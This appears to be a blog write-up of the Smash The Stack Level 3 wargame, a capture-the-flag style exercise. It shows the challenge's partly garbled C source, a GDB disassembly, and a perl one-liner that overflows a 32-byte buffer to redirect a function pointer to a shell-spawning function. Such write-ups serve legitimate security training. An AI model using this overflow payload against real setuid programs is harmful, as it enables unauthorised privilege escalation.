Smash The Stack – Level3


I have made some changes in the code for debugging. But later came
to know that it was not neccassary :/

int good(int addr) {
printf("Address of hmm: %p\n", addr);

int hmm() {
execl("/bin/sh", "sh", NULL);

extern char **environ;

int main(int argc, char **argv) {

int i, limit;

for(i = 0; environ[i] != NULL; i++)
memset(environ[i], 0x00, strlen(environ[i]));
int (*fptr)(int) = good;

char buf[32];

if(strlen(argv[1]) <= 40) limit = strlen(argv[1]);

for(i = 0; i <= limit; i++) {
buf[i] = argv[1][i];
if(i < 36) buf[i] = 0x41;

printf("Buffer: %s", buf);
int (*hmmptr)(int) = hmm;

printf("\nCalling good function\n");

return 0;


This is really a simple challenge.

I just executed the program with a random argument.
And i got the address of hmm. Keep that in your mind 🙂

$ ./level3 AAA
Buffer: AAAA΂�����
Calling good function
Address of hmm: 0x80484e0

Lets get into code first.
Our intention is to call hmm function which calls a shell with
suid. There is a charecter array buf into which argv[1] is passed.
So there is a chance of an overflow, so inorder to overflow
we have to give length(argv[1]) > 32 to get a seg fault.
So i gave arguments of 36 length. Luckily on my first try itself
i got a segfault. Which means instruction pointer is overwritten
with the given value. So i turned on GDB for disassembling.

$ gdb level3
(gdb) set disassembly-flavor intel
(gdb) set print asm-demangle
(gdb) set demangle-style auto
(gdb) disassemble main
Dump of assembler code for function main:
0x08048510 : push ebp
0x08048511 : mov ebp,esp
0x08048513 : push edi
0x08048514 : and esp,0xfffffff0
0x08048668 : call eax
0x0804866a : mov eax,0x0
0x0804866f : mov edi,DWORD PTR [ebp-0x4]
0x08048672 : leave
0x08048673 : ret

Well i noticed this line in the
0x08048668 : call eax
we have the supreme control over the eax and hence we can execute
whatever we want in the memory if we know the address of that location.

so we have to make an exploit with which overflows the buf and then
the address of the hmm function!

(gdb) r $(perl -e 'print "A"x36 . "\xe0\x84\x04\x08"';)
Calling good function
process 5199 is executing new program: /bin/zsh4

Note: You shouldn’t try it in gdb. Gdb doesn’t gives a shell with
higher setuid.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s